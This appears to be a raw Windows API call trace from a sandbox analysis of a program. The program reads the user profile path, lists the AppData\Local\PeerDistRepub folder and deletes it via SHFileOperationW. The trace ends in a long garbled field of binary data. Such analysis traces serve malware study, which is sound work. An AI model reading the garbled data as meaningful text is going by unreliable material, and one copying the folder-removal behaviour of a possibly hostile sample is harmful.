CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0198.889] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0198.889] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0198.889] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0198.889] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0198.889] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0198.889] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0198.889] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0198.889] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0198.889] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0198.889] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0198.889] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0198.889] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0198.889] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0198.889] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0198.889] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0198.889] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0198.889] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0198.889] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0198.889] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0198.889] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0198.890] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0198.890] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0198.890] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0198.890] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0198.890] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0198.890] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0198.890] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0198.890] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0198.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6ee0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0198.890] CryptReleaseContext (hProv=0xa7c440, dwFlags=0x0) returned 1 [0198.890] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0198.890] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0198.890] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0198.890] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0198.890] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0198.890] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0198.890] FreeLibrary (hLibModule=0x76390000) returned 1 [0198.890] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0198.890] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0198.890] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0198.891] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0198.891] CloseHandle (hObject=0x44c) returned 1 [0198.892] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0198.892] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0198.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0198.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0198.892] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0198.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0198.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0198.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa780 [0198.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0198.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7f8 [0198.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0198.892] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0198.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0198.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0198.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0198.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0198.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0198.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0198.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0198.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0198.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0198.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0198.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0198.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0198.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0198.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0198.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0198.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0198.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0198.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0198.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0198.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0198.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0198.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0198.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0198.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0198.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0198.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0198.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x58) returned 0x2a5fae0 [0198.893] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/PeerDistRepub", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub", lpFilePart=0x8cedf4*="PeerDistRepub") returned 0x2b [0198.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5fae0 | out: hHeap=0x2af0000) returned 1 [0198.894] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\peerdistrepub")) returned 0x10 [0198.894] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdf9e1b08, ftCreationTime.dwHighDateTime=0x1d32734, ftLastAccessTime.dwLowDateTime=0xd2f40fba, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xdf9e1b08, ftLastWriteTime.dwHighDateTime=0x1d32734, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".", cAlternateFileName="")) returned 0x9e1bb8 [0198.894] FindNextFileW (in: hFindFile=0x9e1bb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdf9e1b08, ftCreationTime.dwHighDateTime=0x1d32734, ftLastAccessTime.dwLowDateTime=0xd2f40fba, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xdf9e1b08, ftLastWriteTime.dwHighDateTime=0x1d32734, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 1 [0198.894] FindNextFileW (in: hFindFile=0x9e1bb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdf9e1b08, ftCreationTime.dwHighDateTime=0x1d32734, ftLastAccessTime.dwLowDateTime=0xd2f40fba, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xdf9e1b08, ftLastWriteTime.dwHighDateTime=0x1d32734, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 0 [0198.894] FindClose (in: hFindFile=0x9e1bb8 | out: hFindFile=0x9e1bb8) returned 1 [0198.894] GetLastError () returned 0x12 [0198.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0198.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0198.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0198.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0198.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0198.895] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0198.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0198.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0198.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0198.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0198.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0198.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0198.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0198.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0198.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0198.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0198.895] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0198.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0198.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0198.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6a8 [0198.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0198.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0198.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa798 [0198.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0198.895] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0198.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0198.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0198.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0198.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0198.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0198.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0198.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0198.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0198.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0198.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0198.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0198.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0198.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0198.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0198.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0198.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0198.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0198.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0198.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0198.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0198.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0198.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0198.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0198.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0198.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0198.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0198.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0198.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0198.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0198.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0198.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0198.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0198.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0198.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0198.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0198.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0198.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0198.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x58) returned 0x2a5f960 [0198.897] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/PeerDistRepub", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub", lpFilePart=0x8cf650*="PeerDistRepub") returned 0x2b [0198.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f960 | out: hHeap=0x2af0000) returned 1 [0198.897] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\peerdistrepub")) returned 0x10 [0198.897] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械